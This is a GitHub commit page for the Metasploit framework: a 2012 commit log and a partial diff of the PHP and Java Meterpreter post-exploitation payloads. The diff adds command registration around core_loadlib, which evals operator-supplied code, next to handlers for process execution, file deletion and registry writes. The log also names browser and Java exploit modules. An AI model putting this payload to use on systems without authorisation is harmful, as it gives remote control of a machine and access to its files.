Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

Squashed commit of the following:

commit 6a3ad1d
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cb
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef256
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef765.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c3357
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b6583
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef4257
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef765
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976a
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab1
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 7483094
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e3597
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3cec
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001e
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e991
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d91
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb63
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 6461181
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a020
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecb
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes #6525]

commit a9a3023
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965c
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b5
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f471397
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See #6525]

commit cde7fcc
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves #6525 on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c4
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efa
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e8238
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b01
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d5719
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e3
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e15
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a364
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4c
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c0
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a3938
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074ead
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f6
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d306
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b326
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c5
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
  • Loading branch information...
commit 42719ab34bb9ca51d2cd623777662fc2253857f1 1 parent 55bb7ab
@egypt egypt authored
Showing with 571 additions and 356 deletions.
  1. BIN  data/meterpreter/ext_server_networkpug.lso
  2. BIN  data/meterpreter/ext_server_sniffer.lso
  3. 0  data/meterpreter/ext_server_stdapi.jar
  4. BIN  data/meterpreter/ext_server_stdapi.lso
  5. +48 −17 data/meterpreter/ext_server_stdapi.php
  6. BIN  data/meterpreter/meterpreter.jar
  7. +21 −3 data/meterpreter/meterpreter.php
  8. +18 −1 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/CommandManager.java
  9. +4 −2 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
  10. +6 −2 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/core/core_loadlib.java
  11. +9 −9 external/source/meterpreter/source/common/base.c
  12. +3 −3 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
  13. +2 −0  external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
  14. +9 −1 external/source/meterpreter/source/server/posix/remote_dispatch.c
  15. +10 −0 external/source/meterpreter/source/server/win/remote_dispatch.c
  16. +63 −53 lib/msf/core/post/file.rb
  17. +75 −128 lib/msf/core/post/linux/system.rb
  18. +16 −46 lib/msf/core/post/solaris/system.rb
  19. +22 −1 lib/rex/post/meterpreter/client.rb
  20. +9 −5 lib/rex/post/meterpreter/client_core.rb
  21. +10 −10 lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
  22. +8 −2 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
  23. +52 −20 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
  24. +28 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
  25. +59 −15 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
  26. +35 −5 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
  27. +19 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
  28. +9 −0 lib/rex/text.rb
  29. +11 −9 modules/auxiliary/server/browser_autopwn.rb
  30. +3 −0  modules/exploits/multi/browser/java_rhino.rb
  31. +4 −11 modules/post/osx/gather/enum_adium.rb
  32. +1 −1  test/modules/post/test/file.rb
  33. +16 −9 test/modules/post/test/meterpreter.rb
  34. +1 −1  test/modules/post/test/unix.rb
View
BIN  data/meterpreter/ext_server_networkpug.lso
Binary file not shown
View
BIN  data/meterpreter/ext_server_sniffer.lso
Binary file not shown
View
0  data/meterpreter/ext_server_stdapi.jar 100755 → 100644
File mode changed
View
BIN  data/meterpreter/ext_server_stdapi.lso
Binary file not shown
View
65 data/meterpreter/ext_server_stdapi.php
@@ -283,6 +283,7 @@ function cononicalize_path($path) {
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
+register_command('stdapi_fs_file_expand_path');
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -320,18 +321,8 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
}
}
-
-if (!function_exists('stdapi_fs_mkdir')) {
-function stdapi_fs_mkdir($req, &$pkt) {
- my_print("doing mkdir");
- $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
- $ret = mkdir(cononicalize_path($path_tlv['value']),0777);
- return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
-}
-}
-
-
if (!function_exists('stdapi_fs_delete_dir')) {
+register_command('stdapi_fs_delete_dir');
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -340,9 +331,19 @@ function stdapi_fs_delete_dir($req, &$pkt) {
}
}
+if (!function_exists('stdapi_fs_mkdir')) {
+register_command('stdapi_fs_mkdir');
+function stdapi_fs_mkdir($req, &$pkt) {
+ my_print("doing mkdir");
+ $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+ $ret = @mkdir(cononicalize_path($path_tlv['value']));
+ return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
# works
if (!function_exists('stdapi_fs_chdir')) {
+register_command('stdapi_fs_chdir');
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -353,6 +354,7 @@ function stdapi_fs_chdir($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete')) {
+register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -363,6 +365,7 @@ function stdapi_fs_delete($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_getwd')) {
+register_command('stdapi_fs_getwd');
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@@ -373,6 +376,7 @@ function stdapi_fs_getwd($req, &$pkt) {
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
+register_command('stdapi_fs_ls');
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -413,6 +417,7 @@ function stdapi_fs_ls($req, &$pkt) {
}
if (!function_exists('stdapi_fs_separator')) {
+register_command('stdapi_fs_separator');
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
@@ -420,6 +425,7 @@ function stdapi_fs_separator($req, &$pkt) {
}
if (!function_exists('stdapi_fs_stat')) {
+register_command('stdapi_fs_stat');
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -452,6 +458,7 @@ function stdapi_fs_stat($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete_file')) {
+register_command('stdapi_fs_delete_file');
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -467,6 +474,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
}
if (!function_exists('stdapi_fs_search')) {
+register_command('stdapi_fs_search');
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
@@ -506,6 +514,7 @@ function stdapi_fs_search($req, &$pkt) {
if (!function_exists('stdapi_fs_md5')) {
+register_command("stdapi_fs_md5");
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
@@ -524,6 +533,7 @@ function stdapi_fs_md5($req, &$pkt) {
if (!function_exists('stdapi_fs_sha1')) {
+register_command("stdapi_fs_sha1");
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
@@ -545,6 +555,7 @@ function stdapi_fs_sha1($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_config_getuid')) {
+register_command('stdapi_sys_config_getuid');
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
@@ -563,15 +574,17 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
# Unimplemented becuase it's unimplementable
-if (!function_exists('stdapi_sys_config_rev2self')) {
-function stdapi_sys_config_rev2self($req, &$pkt) {
- my_print("doing rev2self");
- return ERROR_FAILURE;
-}
-}
+#if (!function_exists('stdapi_sys_config_rev2self')) {
+#register_command('stdapi_sys_config_rev2self');
+#function stdapi_sys_config_rev2self($req, &$pkt) {
+# my_print("doing rev2self");
+# return ERROR_FAILURE;
+#}
+#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
+register_command('stdapi_sys_config_sysinfo');
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@@ -584,6 +597,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
+register_command('stdapi_sys_process_execute');
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
@@ -658,6 +672,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
if (!function_exists('stdapi_sys_process_close')) {
+register_command('stdapi_sys_process_close');
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
@@ -711,6 +726,7 @@ function close_process($proc) {
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
+register_command('stdapi_sys_process_get_processes');
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
@@ -760,6 +776,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_process_getpid')) {
+register_command('stdapi_sys_process_getpid');
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@@ -768,6 +785,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
}
if (!function_exists('stdapi_sys_process_kill')) {
+register_command('stdapi_sys_process_kill');
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
@@ -798,6 +816,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
+register_command('stdapi_net_socket_tcp_shutdown');
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@@ -838,6 +857,9 @@ function deregister_registry_key($id) {
if (!function_exists('stdapi_registry_create_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_create_key');
+}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
if (is_windows() and is_callable('reg_open_key')) {
@@ -871,6 +893,9 @@ function stdapi_registry_create_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_close_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_close_key');
+}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@@ -889,6 +914,9 @@ function stdapi_registry_close_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_query_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_query_value');
+}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@@ -926,6 +954,9 @@ function stdapi_registry_query_value($req, &$pkt) {
}
if (!function_exists('stdapi_registry_set_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_set_value');
+}
function stdapi_registry_set_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
View
BIN  data/meterpreter/meterpreter.jar 100755 → 100644
Binary file not shown
View
24 data/meterpreter/meterpreter.php
@@ -30,6 +30,18 @@
$GLOBALS['readers'] = array();
}
+# global list of extension commands
+if (!isset($GLOBALS['commands'])) {
+ $GLOBALS['commands'] = array("core_loadlib");
+}
+
+function register_command($c) {
+ global $commands;
+ if (! in_array($c, $commands)) {
+ array_push($commands, $c);
+ }
+}
+
function my_print($str) {
#error_log($str);
}
@@ -389,14 +401,20 @@ function core_shutdown($req, &$pkt) {
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
+ global $commands;
my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
- } else {
- eval($data_tlv['value']);
- return ERROR_SUCCESS;
}
+ $tmp = $commands;
+ eval($data_tlv['value']);
+ $new = array_diff($commands, $tmp);
+ foreach ($new as $meth) {
+ packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
+ }
+
+ return ERROR_SUCCESS;
}
View
19 ...al/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/CommandManager.java
@@ -2,6 +2,7 @@
import java.util.HashMap;
import java.util.Map;
+import java.util.Vector;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.meterpreter.command.NotYetImplementedCommand;
@@ -16,6 +17,7 @@
private final int javaVersion;
private Map/* <String,Command> */registeredCommands = new HashMap();
+ private Vector/* <String> */newCommands = new Vector();
protected CommandManager() throws Exception {
// get the API version, which might be different from the
@@ -97,6 +99,7 @@ public void registerCommand(String command, Class commandClass, int version, int
}
Command cmd = (Command) commandClass.newInstance();
registeredCommands.put(command, cmd);
+ newCommands.add(command);
}
/**
@@ -108,4 +111,18 @@ public Command getCommand(String name) {
cmd = NotYetImplementedCommand.INSTANCE;
return cmd;
}
-}
+
+ /**
+ * Reset the list of commands loaded by the last core_loadlib call
+ */
+ public void resetNewCommands() {
+ newCommands.clear();
+ }
+
+ /**
+ * Retrieves the list of commands loaded by the last core_loadlib call
+ */
+ public String[] getNewCommands() {
+ return (String[]) newCommands.toArray(new String[newCommands.size()]);
+ }
+}
View
6 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
